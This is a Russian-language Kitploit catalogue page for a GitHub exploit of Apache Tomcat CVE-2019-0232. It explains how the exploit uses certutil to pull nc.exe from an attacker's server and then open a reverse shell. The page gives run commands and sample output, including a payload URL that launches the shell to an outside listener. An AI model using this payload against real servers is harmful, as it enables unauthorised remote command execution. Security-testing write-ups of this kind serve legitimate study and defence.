Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-0232 — Hi this is a revised and enhanced code for CVE-2019-0232 | Kitploit
Инструменты/GitHubGitHub/dharan10/cve-2019-0232
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubdharan10/cve-2019-0232

CVE-2019-0232

Hi this is a revised and enhanced code for CVE-2019-0232

Репозиторий
221 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для Apache Tomcat CVE-2019-0232

Этот скрипт эксплуатирует уязвимость CVE-2019-0232 в Apache Tomcat, которая позволяет удаленно выполнять код из-за неправильной обработки скрипта ism.bat. Скрипт использует технику реверс-шелла с помощью certutil и nc.exe (Netcat) для получения удаленного доступа к уязвимой системе.

Обзор уязвимости:

  • Идентификатор CVE: CVE-2019-0232
  • Затронутые продукты: Apache Tomcat 6.x, 7.x, 8.x и 9.x
  • Описание:
    • CVE-2019-0232 — уязвимость в обработке запросов к ism.bat в Apache Tomcat, которая может позволить злоумышленникам выполнять произвольные команды на сервере. Уязвимость возникает из-за отсутствия надлежащей проверки ввода пользователя, что позволяет злоумышленникам инициировать выполнение произвольных команд с помощью специально сформированного запроса.
    • Уязвимость может быть использована для загрузки вредоносного файла nc.exe с удаленного сервера и его применения для создания реверс-шелла.

Требования:

  • Python 3: Скрипт предназначен для Python 3.x.
  • Netcat: На сервере должен быть размещен слушатель Netcat (nc.exe) для подключения реверс-шелла.
  • Apache Tomcat: Целевой сервер должен работать на уязвимой версии Apache Tomcat (6.x, 7.x, 8.x или 9.x), подверженной CVE-2019-0232.

Как это работает:

  1. Загрузка nc.exe: Скрипт отправляет специально сформированный запрос на уязвимый сервер Tomcat для загрузки файла nc.exe (Netcat) на целевую машину с помощью certutil.
  2. Реверс-шелл: После загрузки nc.exe отправляется другой запрос для выполнения команды реверс-шелла, который подключается обратно к слушателю Netcat атакующего.

Использование:

1. Клонирование репозитория:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. Редактирование скрипта или запуск с вводом данных:

root@kitploit:~
python3 exploit.py

3. Вас попросят ввести следующие данные:

root@kitploit:~
Target Host: IP-адрес сервера Apache Tomcat для эксплуатации.
Target Port: Порт целевого сервера (по умолчанию: 8080).
Server IP: IP-адрес сервера, на котором размещен nc.exe.
Server Port: Номер порта, на котором размещен nc.exe (по умолчанию: 80).
Netcat Listener IP: Ваш IP-адрес, который будет принимать реверс-шелл.
Netcat Listener Port: Порт, на котором вы слушаете реверс-шелл.

Пример:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

После успешного выполнения вы должны получить соединение реверс-шелла обратно к вашему слушателю Netcat.

Отказ от ответственности:

Этот скрипт предназначен только для образовательных целей. Не используйте его для вредоносных действий. Всегда получайте надлежащее разрешение перед попытками проведения пентеста или аудита безопасности. Неправильное использование этого скрипта может привести к юридическим последствиям.

Важные замечания:

  • Убедитесь, что сервер Apache Tomcat не имеет исправления для CVE-2019-0232 перед использованием этого эксплойта.
  • Скрипт может потребовать административных привилегий в зависимости от конфигурации целевой системы.

Автор: A!Z3N(Dharan)

Сделано с мощью!

Лицензия:

Этот проект лицензирован в соответствии с MIT License.

Однако используйте его на свой страх и риск. Этот код предоставлен только для образовательных целей. Используя этот код, вы соглашаетесь взять на себя полную ответственность за любые действия, вытекающие из его использования. Неправильное или несанкционированное использование этого эксплойта может привести к юридическим последствиям. Всегда получайте надлежащее разрешение перед проведением любого тестирования безопасности или пентеста на любой системе.

Вы можете свободно использовать, изменять и распространять этот код, но только в этических целях. Автор не несет ответственности за любой ущерб, причиненный этим кодом.

Не используйте этот эксплойт без явного разрешения владельца целевой системы.

Скачать инструмент